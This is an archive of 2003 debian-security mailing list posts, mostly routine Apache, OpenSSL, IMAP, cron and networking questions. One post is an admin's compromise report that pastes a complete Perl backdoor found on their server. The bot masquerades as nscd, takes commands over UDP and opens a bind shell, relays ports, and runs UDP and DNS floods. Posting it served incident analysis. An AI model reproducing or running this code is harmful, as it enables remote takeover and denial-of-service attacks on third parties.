Perhaps I've got you wrong but wouldn't --- snip --- TransferLog "| /usr/sbin/rotatelogs /var/www/domain.tld/logs/domain.tld-%Y-%m-%d_access.log 604800" --- end --- do it? Martynas Domarkas <[EMAIL PROTECTED]> wrote on 10 Jun 2003 13:02:55 +0300: > An, 2003-06-10 12:56, Teun Vink raðë: > > On Tue, 2003-06-10 at 11:07, Martynas Domarkas wrote: > > [...] > > > > > > Thanks, but I realy do not like instalation of another packages. There > > > must be a way to do this with apache configuration. > > > > You could add a line to your /etc/logrotate.d/apache configuration, > > so it would look something like this: > > > > [...] > >postrotate > > /etc/init.d/apache reload > /dev/null > > mv -f $1.0 $1.`date +"%Y-%m-%d"` > >endscript > > [...] > > > > This would rename access.log.0 to access.log.2003-06-10 > > > > > > Regards, > > > > > > Teun Vink > > > > Thanks a lot. This is nice solution, but I still like apache do the job, > and let logrotate simpy rotate /var/log/apache/*.log. I feel like I have > seen somewhere some piece of shell command in httpd.conf. > > > -- > Pagarbiai > IT sistemø administratorius > Martynas Domarkas > tel.: +370 698 44331 > > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] Mit freundlichen Gruessen / Best regards Dominik Schulz -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
RE: OPENSSL
> I'm trying to generate a 40-bit certificate using OPENSSL.Can > anybody tell me if this is possible and with which package? The RSA keys used in X.509 certificates are typically 1024 or 2048 bits in length. What length the symmetric key used between two parties that have authenticated via X.509 certificates (with RSA keys) to subsequently protect their communication has, is not directly related to the certificate. There are web browsers that will negotiate 128 bits only if the certificate presented by the web server is a "step-up certificate". I'm not sure what makes a certificate a step-up certificate, however, nor if this restriction still applies to current browsers. Cheers, Tobias -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: OPENSSL
Reckhard, Tobias wrote: There are web browsers that will negotiate 128 bits only if the certificate presented by the web server is a "step-up certificate". I'm not sure what makes a certificate a step-up certificate, however, nor if this restriction still applies to current browsers. The step up involved the browser checking the signer was a legitimate CA to sign a step-up cert and then performing the re-negotiation. The restriction disapeared when the crypto export laws were all relaxed. You have to go a fair way back (few years) to get a browser that still only supports 128bit symmetric in SGC mode. Cheers, Berin -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Re[2]: apache
An, 2003-06-10 13:46, Dominik Schulz rašė: > Perhaps I've got you wrong but wouldn't > --- snip --- > TransferLog "| /usr/sbin/rotatelogs > /var/www/domain.tld/logs/domain.tld-%Y-%m-%d_access.log 604800" > --- end --- > do it? > > Martynas Domarkas <[EMAIL PROTECTED]> wrote on 10 Jun 2003 13:02:55 +0300: > > > An, 2003-06-10 12:56, Teun Vink raðë: > > > On Tue, 2003-06-10 at 11:07, Martynas Domarkas wrote: > > > [...] > > > > > > > > Thanks, but I realy do not like instalation of another packages. There > > > > must be a way to do this with apache configuration. > > > > > > You could add a line to your /etc/logrotate.d/apache configuration, > > > so it would look something like this: > > > > > > [...] > > >postrotate > > > /etc/init.d/apache reload > /dev/null > > > mv -f $1.0 $1.`date +"%Y-%m-%d"` > > >endscript > > > [...] > > > > > > This would rename access.log.0 to access.log.2003-06-10 > > > > > > > > > Regards, > > > > > > > > > Teun Vink > > > > > > > Thanks a lot. This is nice solution, but I still like apache do the job, > > and let logrotate simpy rotate /var/log/apache/*.log. I feel like I have > > seen somewhere some piece of shell command in httpd.conf. > > > > > > -- > > Pagarbiai > > IT sistemø administratorius > > Martynas Domarkas > > tel.: +370 698 44331 > > > > > > > > -- > > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > > > Mit freundlichen Gruessen / Best regards > Dominik Schulz > Yes, of course. But in this case I will invoke rotatelogs... I don't like it. -- Pagarbiai IT sistemų administratorius Martynas Domarkas tel.: +370 698 44331 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bom dia debian-securityESCUTA21 em Novo Formato
Message to [EMAIL PROTECTED] Ola debian-security GANHAMOS O PRÊMIO DE MELHOR SITE DO RAMO ==Estamos operando em Novo Formato== Confira em: escuta21.kit.netou http://www.escuta21.kit.net ei debian-security Cuidado com o que fala ao Celular... ele tb tem ouvidos... para remover o [EMAIL PROTECTED] de nossa lista responda este e-mail e coloque remover nos perdoe o transtorno...ok? kandrak -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: IMAP is too secure...
Hi Richard, Since libc-client2003debian it's only posible to use a SSL connection. Most clients support it, but if you really want to allow plaintext IMAP again, please run 'dpkg-reconfigure libc-client2003debian' and awnser Yes to 'Should plaintext passwords be enabled?'. To enable it manualy, create /etc/c-client.cf with the following contents: --8<-- I accept the risk set disable-plaintext nil --8<-- A better sollution would be to set your client to use SSL on port 993. The only thing you still have to worry about are the certificates. Jelmer - Original Message - From: "Hobbs, Richard" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Tuesday, June 10, 2003 8:32 AM Subject: IMAP is too secure... > Helo, > > I think my IMAP server has become too secure... I'm using the current > version of "uw-imapd" and "libc-client2003debian", as listed in stable and > stable-proposed-updates. > > I cannot log into my IMAP server any more... It keeps saying Invalid > password. I can only assume it's using password encryption, but I don't > know how to turn it off. > > It was never turned on before, but since the upgrade I've een unable to > retrieve my mail through IMAP. It usually asks in the config whether I > want clear-text passwords enabled or not, but it wasn't an option this > time. > > Any ideas? I really need to get at the mail. > > Thanks in advance... > > Hobbs. > > -- > Richard Hobbs <[EMAIL PROTECTED]> > http://mongeese.co.uk | http://unixforum.co.uk > > "There's only one way of life, and that's your own" - The Levellers > > Registered Linux User: 313906 > _ > Send all your jokes to [EMAIL PROTECTED] !! > To subscribe, email: [EMAIL PROTECTED] > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Default Apache install not fit for multiple domains/users
Thank you for the information. Am I right that php-skripts then would need an execute-bit set? Currently they don't have ... On 9 Jun 2003 at 17:59, Jon wrote: > On Mon, 2003-06-09 at 17:28, Phillip Hofmeister wrote: > > -BEGIN PGP SIGNED MESSAGE- > > Hash: SHA1 > > > > On Mon, 09 Jun 2003 at 09:35:49PM +0200, Stefan Neufeind wrote: > > > But you mean starting with #! ?? How could I use the normal way of > > > setting a cgi-handler for calling .php-files? Know what I mean? > > > > > > Using Misc Binary-support (and therefor patching the kernel) seems > > > no solution to me. Isn't there some way to make it work using > > > Apache- features? > > > > MISC Binary is not patching the kernel. MISC Binary comes as an > > option with the stock kernel. You might have to compile your own > > kernel (I don't know, I haven't used a stock Debian kernel in a VERY > > long time...) > > > > The binfmt_misc kernel module is included in the stock Debian kernels, > AFAIK. There is a nice package, binfmt-support (ala > update-alternatives) that allows one to easily configure binfmt_misc: > > > Package: binfmt-support > Support for extra binary formats > > The binfmt_misc kernel module, contained in versions 2.1.43 and later > of the Linux kernel, allows system administrators to register > interpreters for various binary formats based on a magic number or > their file extension, and cause the appropriate interpreter to be > invoked whenever a matching file is executed. Think of it as a more > flexible version of the #! executable interpreter mechanism. > > This package provides an 'update-binfmts' script with which package > maintainers can register interpreters to be used with this module > without having to worry about writing their own init.d scripts, and > which sysadmins can use for a slightly higher-level interface to this > module. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: OPENSSL
I'm using a 128-bit-cert. But browsers that support less encryption (e.g. IE that comes with WinNT4) can't access my SSL-pages because the encryption doesn't allow degration. Is there any way to solve this prob? Using Apache with an official SSL-cert. PS: This just came to my mind when you said "step-up" - cause in my case it would be a "step-down", right? On 10 Jun 2003 at 21:49, Berin Lautenbach wrote: > Reckhard, Tobias wrote: > > There are web browsers that will negotiate 128 bits only if the > > certificate presented by the web server is a "step-up certificate". > > I'm not sure what makes a certificate a step-up certificate, > > however, nor if this restriction still applies to current browsers. > > The step up involved the browser checking the signer was a legitimate > CA to sign a step-up cert and then performing the re-negotiation. The > restriction disapeared when the crypto export laws were all relaxed. > You have to go a fair way back (few years) to get a browser that still > only supports 128bit symmetric in SGC mode. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
re: strange broadcast packets
Hello, isn't perhaps 10.208.64.1 your dhcp server and aren't this reply to dhcp requests from clients? Carpe Noctem, Kuba BIGHard Jakubik -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
unsubscibe
hi my name is loretta i got this really cool incredimail downloaded on my computer..but it does not work...I've tried every thing my email will come to the incredimail account but i can not respond so i don't want it any more can you please take it off so i can use my sbcglobal account again.I even had t sighn up for a new email address just so i could respond to some of my e mail.thats sad.PLEASE take it off Do you Yahoo!? Free online calendar with sync to Outlook(TM).
Re: Default Apache install not fit for multiple domains/users
On Tue, 2003-06-10 at 08:24, Stefan Neufeind wrote: > Thank you for the information. Am I right that php-skripts then would > need an execute-bit set? Currently they don't have ... > Unfortunately, yes. Otherwise you'll get a 500 Internal Server Error or the likes. - Jon -- [EMAIL PROTECTED] Administrator, tgpsolutions http://www.tgpsolutions.com signature.asc Description: This is a digitally signed message part
Re: Default Apache install not fit for multiple domains/users
On Tue, 10 Jun 2003 at 05:24:59PM +0200, Stefan Neufeind wrote: > Thank you for the information. Am I right that php-skripts then would > need an execute-bit set? Currently they don't have ... > They will be being treated like a normal binary file, so yes (that is, if you want yours scripts to work). If on the other hand, you don't want your sk|pt5 to work then you don't need to set the execute bit . -- Phillip Hofmeister PGP/GPG Key: http://www.zionlth.org/~plhofmei/ wget -O - http://www.zionlth.org/~plhofmei/key.txt | gpg --import -- Excuse #67: Typo in the code -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: nautilus and portmapper port 111
Hi Phillip On Dienstag, 10-Jun-03 at 01:33:07, Phillip Hofmeister wrote: > On Tue, 10 Jun 2003 at 12:20:10AM +0100, Andreas W?st wrote: >> Hi >> >> Although I can see no evidence for portmapper being run by issuing >> "netstat -tu -l -ee -p", everytime nautilus is started it connects to >> port 111, and even gets an answer from there. And even after this >> connection, I can't see a server listening on port 111 via netstat. >> >> What is going on here? If I block port 111 nautilus wont start. >> >> How can I make sure portmapper is not being run, or at least only in >> a controlled manner, say for nautilus? > > > I usually use a netstat -apn (requires r00t). It will show you all > sockets (listening or otherwise) and what app owns them. The -n makes > it so it does not resolve the port numbers via /etc/service. No matter if I try netstat -apn or netstat -atunp as someone pointed out in private, it gives the same result as netstat -tu -l -ee -p, apart from the established connections, namely there is nothing listening in port 111. Furhtermore, package "portmap" is NOT installed, but there are working connections via 111 when nautilus starts up.. -- Best wishes, Andi -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: strange broadcast packets
Hi > Hello, > > isn't perhaps 10.208.64.1 your dhcp server and aren't this reply to > dhcp requests from clients? No lan here.. !! -- Best wishes, Andi -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Re[2]: apache
On Tue, 2003-06-10 at 09:49, Martynas Domarkas wrote: > An, 2003-06-10 13:46, Dominik Schulz rašė: > > Perhaps I've got you wrong but wouldn't > > --- snip --- > > TransferLog "| /usr/sbin/rotatelogs > > /var/www/domain.tld/logs/domain.tld-%Y-%m-%d_access.log 604800" > > --- end --- > > do it? > > > > Martynas Domarkas <[EMAIL PROTECTED]> wrote on 10 Jun 2003 13:02:55 +0300: > > > > > An, 2003-06-10 12:56, Teun Vink raðë: > > > > On Tue, 2003-06-10 at 11:07, Martynas Domarkas wrote: > > > > [...] > > > > > > > > > > Thanks, but I realy do not like instalation of another packages. There > > > > > must be a way to do this with apache configuration. > > > > > > > > You could add a line to your /etc/logrotate.d/apache configuration, > > > > so it would look something like this: > > > > > > > > [...] > > > >postrotate > > > > /etc/init.d/apache reload > /dev/null > > > > mv -f $1.0 $1.`date +"%Y-%m-%d"` > > > >endscript > > > > [...] > > > > > > > > This would rename access.log.0 to access.log.2003-06-10 > > > > > > > > > > > > Regards, > > > > > > > > > > > > Teun Vink > > > > > > > > > > Thanks a lot. This is nice solution, but I still like apache do the job, > > > and let logrotate simpy rotate /var/log/apache/*.log. I feel like I have > > > seen somewhere some piece of shell command in httpd.conf. > > > > > > > > > -- > > > Pagarbiai > > > IT sistemø administratorius > > > Martynas Domarkas > > > tel.: +370 698 44331 > > > > > > > > > > > > -- > > > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > > > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > > > > > > Mit freundlichen Gruessen / Best regards > > Dominik Schulz > > > > Yes, of course. But in this case I will invoke rotatelogs... I don't > like it. > > > -- > Pagarbiai > IT sistemų administratorius > Martynas Domarkas > tel.: +370 698 44331 IIUC, you are wanting to control the file name applied to rotated logs from Apache, but you seem to be of the belief that Apache itself is rotating the log files. Unless this has been added since I last read through the the Apache configuration documentation, I don't remember seeing the log rotation functionality being part of it (although I last read through the documenttation in entirety several years back.) It is handled by a separate package, on Debian most commonly logrotate, regardless of the name applied to the rotated file. -- Mark L. Kahnt, FLMI/M, ALHC, HIA, AIAA, ACS, MHP ML Kahnt New Markets Consulting Tel: (613) 531-8684 / (613) 539-0935 Email: [EMAIL PROTECTED] signature.asc Description: This is a digitally signed message part
Re: strange broadcast packets
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Tue, 10 Jun 2003 at 07:21:25PM +0100, Andreas W?st wrote: > Hi > > > Hello, > > > > isn't perhaps 10.208.64.1 your dhcp server and aren't this reply to > > dhcp requests from clients? > > No lan here.. !! That IP address might be used by your cable modem service as an internal management address to hand out IP addresses. Or it might even be your bridge (cable modem). In either case. This is not something to be worried about. In fact I made a special rule in my iptables so such packets don't get logged. Be well, - -- Phillip Hofmeister PGP/GPG Key: http://www.zionlth.org/~plhofmei/ wget -O - http://www.zionlth.org/~plhofmei/key.txt | gpg --import - -- Excuse #34: Heavy gravity fluctuation move computer to floor rapidly -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.2 (GNU/Linux) iD8DBQE+5iqFS3Jybf3L5MQRAvTTAJ9HjtzJ3VLuxePPG6Ph9ZOW9dYKgACfXpet jjtqPu0j7Se0dWS2gwScG10= =3kbY -END PGP SIGNATURE- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
unsubscribe
-- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: nautilus and portmapper port 111
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Andreas Wüst sent the following message Today: AW> No matter if I try netstat -apn or netstat -atunp as someone pointed out AW> in private, it gives the same result as netstat -tu -l -ee -p, apart AW> from the established connections, namely there is nothing listening in AW> port 111. Have you tried "rpcinfo -p localhost" to see if Nautilus is registering a connection to portmap? The newer Gnome installs (gnomevfs) depend on fam, which depends on portmap. I don't believe there is a direct dependency from core Nautilus to portmap, but possibly some of the Nautilus extras or vfs extrase are causing the dependency. - -- Chris Caldwell Information Systems Coordinator, Enterprise Systems Information Systems and Services, The George Washington University caldwell @ gwu . edu | +1 202.994.4674 (w) | +1 202.409.0878 (c) http://asclepius.tops.gwu.edu | GPG key ID: 0xE52D0BE8 "Formal education can rarely improve the character of a scoundrel." - Derek Bok, Harvard University -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.2 (GNU/Linux) iD8DBQE+5kId1YKAfuUtC+gRAiWJAJ9Cpr8WyWV061ppN9m6O1OXRmW9jwCfQHcl AWB5FF7DcvK7wMCroRqdn5M= =iqMD -END PGP SIGNATURE- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
a weird script worm uploaded via php with debian 3.0 ?
Hello,
I logged in to my server today to find that
/usr/sbin/ncsd was running about 50 copies,
since I don't have BIND installed, obviously
something was up...they were also running with
the user www-data...
After a little bit of research I found a new
crontab entryFile: /tmp/crontab.LYukbF
0 * * * * /tmp/.nscdrecover
this starts at
auth.log.0:Jun 6 17:00:01 debian
PAM_unix[26934]: (cron) session opened for user
www-data by (uid=0)auth.log.0:Jun 6 17:00:02
debianPAM_unix[26934]: (cron) session closed for user
www-dataand runs every hour
and under SYSLOG it starts
syslog.3:Jun 6 16:27:27 debian crontab[26795]:
(www-data) LIST (www-data)syslog.3:Jun 6
16:27:28 debiancrontab[26798]:
(www-data) REPLACE (www-data)syslog.3:Jun 6
16:27:34debian crontab[26804]:
(www-data) LIST (www-data)syslog.3:Jun 6
16:27:34 debiancrontab[26807]:
(www-data) REPLACE (www-data)syslog.3:Jun 6
17:00:01 debian/USR/SBIN/CRON[26937]: (www-data) CMD
(/tmp/.nscdrecover)
so I found /tmp/.ncsdrecover and it looks like
some kind of port scanner/trojan
the contents are pasted below
#!/usr/bin/perl -w
$pass = "J9YcGEyNypkzI";
$str = 'Mess with the best - die like a
rest!'x1337;
use IO::Socket;
use IO::Select;
use POSIX;
sub redir
{
my $port = shift;
my $dest = shift;
$SIG{ALRM} = sub { exit };
alarm 60;
$sa = IO::Socket::INET->new( Proto => "tcp",
Listen => 1, ReuseAddr => 1,
LocalPort =>$port) or exit;
$sin = $sa->accept or exit;
close($sa);
alarm 0;
$sout = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => $dest) or exit;$sin->autoflush(1);
$sout->autoflush(1);
$sel = IO::Select->new($sin, $sout);
while(@sock = $sel->can_read(180)) {
foreach $s(@sock) {
$buf = <$s>; exit unless($buf);
print $sout $buf if($s eq $sin);
print $sin $buf if($s eq $sout);
}}}
sub shell
{
my $port = shift;
$SIG{ALRM} = sub { exit };
alarm 60;
use Socket;
socket(S, PF_INET, SOCK_STREAM, 0);
setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
bind(S, sockaddr_in($port, INADDR_ANY));
listen(S, 1);
accept(X, S);
close(S);
alarm 0;
open STDIN, "<&X";
open STDOUT, ">&X";
open STDERR, ">&X";
close X;
exec("/bin/sh");
}
sub udp
{
my $host = shift;
my $time = shift;
$sock = IO::Socket::INET->new(Proto =>
'udp', PeerAddr => $host,
PeerPort => int(rand 65535))
or exit;
$sock->autoflush(1);$SIG{ALRM} = sub { exit };
alarm 15 unless(alarm $time);
print $sock $str while(1);
}
}
sub ddns
{
my $host = shift;
my $time = shift;
$sock = new IO::Socket::INET->new(Proto
=> 'udp', PeerAddr => $host,
PeerPort => 53) or exit;
$sock->autoflush(1);
$SIG{ALRM} = sub { exit };
alarm 15 unless(alarm $time);
while(1) {
my $s = int(rand(89)+10);
my $r1 = int(rand(89)+10);
my $r2 = int(rand(89)+10);
my $r3 = int(rand(89)+10);
my $r4 = int(rand(89)+10);
send($sock,"$s\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x02$r1\x02$r2\x02$r3\x02$r4\x07in-addr\x04arpa\x00\x00\x0c\x00\x01",0);}}
$0 = '/usr/sbin/nscd'.' 'x100;
exit if fork;
$SIG{ALRM} = 'IGNORE';
$SIG{TERM} = 'IGNORE';
$SIG{CHLD} = 'IGNORE';
$SIG{INT} = 'IGNORE';
$SIG{QUIT} = 'IGNORE';
$SIG{HUP} = 'IGNORE';
open STDIN, "/dev/null";
open STDERR, ">/dev/null";
POSIX::setsid();
$csock = IO::Socket::INET->new(Proto => 'udp',
LocalPort => 1337, ReuseAddr => 1) or
exit;while($string =<$csock>)
{
chop($string);
my ($pw, $cmd, $arg1, $arg2) = split "
", $string;next unless($cmd);
next unless($arg1);
next unless(crypt($pw, $pass) eq $pass);
if ($cmd eq "ping") {
my $bsock =
IO::Socket::INET->new(Proto =>
'udp', PeerAddr => $arg1,
PeerPort => $arg2,
ReuseAddr => 1) or
next;
print $bsock"pong ".`uname
-mnrs`;
close $bsock;
} elsif ($cmd eq "die") {
exit if(crypt($arg1, $pass) eq $pass);
} elsif ($cmd eq "redir") {
redir($arg1, $arg2) unless(fork);
} elsif ($cmd eq "shell") {
shell($arg1) unless(fork);
} elsif ($cmd eq "udp") {
udp($arg1, $arg2) unless(fork);
} elsif ($cmd eq "ddns") {
ddns($arg1, $arg2) unless(fork);
}
}
A little history is that my server was hacked
with some trojan that was sending out SPAM and I
did a fresh reinstall with debian so I could
have automatic updates and the like. I copied
over a few of the home directorys from the old
site.Then this all started after a user logged
in onFriday June 6th first login at 14:16 ending
14:24the script starts at 14:27
worldspe ftpd26405pm6-s104.amazon. Fri Jun
6 15:06 -
Re: apache
Martynas Domarkas wrote: > > Thanks, but I realy do not like instalation of another packages. There > must be a way to do this with apache configuration. Martynas Domarkas wrote: > > Thanks a lot. This is nice solution, but I still like apache do the job, > and let logrotate simpy rotate /var/log/apache/*.log. I feel like I have > seen somewhere some piece of shell command in httpd.conf. Martynas Domarkas wrote: > > Yes, of course. But in this case I will invoke rotatelogs... I don't > like it. As, you've exhausted the other possibilites, why not read the fine manual: http://httpd.apache.org/docs/logs.html -- Jamie Heilman http://audible.transient.net/~jamie/ "Most people wouldn't know music if it came up and bit them on the ass." -Frank Zappa -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
cronjob stuck
Just ran across an interesting prob, wondered if anyone else has seen it. I added a repeating entry to /etc/cron.d/foo that ran every */5 minutes. I then tried to get rid of it... It will not die. I moved the file out of /etc/cron.d and it still is running. I cp'd the file and deleted the old one in case cron remembered the inode (rather a long shot). No change. I did /etc/init.d/cron stop; /etc/init.d/cron start; still it repeats. I did updatedb and locate cron; can't find it cached anywhere. cron doesn't seem to have any flush options and no indication that it should be caching across executions. I could certainly (I hope!) get rid of it by rebooting but I can't do that with this system at this time. Has anyone else had trouble making vixie cron STFU? Am I hallucinating? Is my brain in need of Coke and M&M's? -- -- IN MY NAME:Dale Amon, CEO/MD No Mushroom clouds over Islandone Society London and New York. www.islandone.org -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: nautilus and portmapper port 111
Hello Chris Thank you for your answer! On Dienstag, 10-Jun-03 at 21:39:47, Chris Caldwell wrote: > -BEGIN PGP SIGNED MESSAGE- > Hash: SHA1 > > Andreas Wüst sent the following message Today: > >> No matter if I try netstat -apn or netstat -atunp as someone >> in private, it gives the same result as netstat -tu -l > -ee -p, apart AW> from the established connections, namely there is > nothing listening in AW> port 111. > > Have you tried "rpcinfo -p localhost" to see if Nautilus is > registering a connection to portmap? No, I haven't yet, but will do! > The newer Gnome installs > (gnomevfs) depend on fam, which depends on portmap. Umm, I thouth woody gnome wouldn't depend on fam, no? > I don't > believe there is a direct dependency from core Nautilus to > portmap, but possibly some of the Nautilus extras or vfs extrase > are causing the dependency. Yeah, it's strange. Even stranger, that nautilus won't start at all, if the connection to port 111 fails!! -- Best wishes, Andi -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: strange broadcast packets
Hi Phillip On Dienstag, 10-Jun-03 at 19:59:40, Phillip Hofmeister wrote: > -BEGIN PGP SIGNED MESSAGE- > Hash: SHA1 > > On Tue, 10 Jun 2003 at 07:21:25PM +0100, Andreas W?st wrote: >> Hi >> >>> Hello, >>> >>> isn't perhaps 10.208.64.1 your dhcp server and aren't this reply to >>> dhcp requests from clients? >> >> No lan here.. !! > > That IP address might be used by your cable modem service as an > internal management address to hand out IP addresses. Or it might even > be your bridge (cable modem). In either case. This is not something to > be worried about. In fact I made a special rule in my iptables so such > packets don't get logged. Cool, thanks a lot for your help!! So, can I happily block them? As it seems, unfortunately I have to keep udp port 68 stateful open, to renew the dhcp lease, no? -- All the best, and really thanks a lot for your answers, Andi -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: cronjob stuck
On Tue, Jun 10, 2003 at 10:22:09PM +0100, Dale Amon wrote: > Has anyone else had trouble making vixie cron STFU? Am > I hallucinating? Is my brain in need of Coke and M&M's? Actually I've now done pretty much just that and discovered it was a strange coincidence... some other process was doing exactly the same thing my cronjob was to do with exactly the same 5 minute interval between runs and one minute off the execution times I expected! -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
RE: OPENSSL
On Tue, Jun 10, Stefan Neufeind wrote: > I'm using a 128-bit-cert. You're using an X.509 certificate. The grade of symmetric encryption negotiated between browser and web server is (at least in theory) independent of the certificate. > But browsers that support less encryption > (e.g. IE that comes with WinNT4) can't access my SSL-pages because > the encryption doesn't allow degration. The original NT shipped with IE2. Are you sure you want people to still use that? > Is there any way to solve > this prob? Using Apache with an official SSL-cert. > > PS: This just came to my mind when you said "step-up" - cause in my > case it would be a "step-down", right? I could imagine that IE2 has numerous problems with SSL. It could well be one of the browsers that need to see step-up certificates before they perform 128-bit symmetric cryptography. But I don't know. Make sure you've allowed your Apache to use small key sizes first. I wouldn't use them, but you should be sure that it's not your server that's refusing to do e.g. 40-bit RC4. Then I'd urge the NT users to apply the latest service pack and preferrably install IE6SP1 plus the Hotfixes that have been released since. And then they should install a better browser and use that instead. ;-> Cheers, Tobias -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
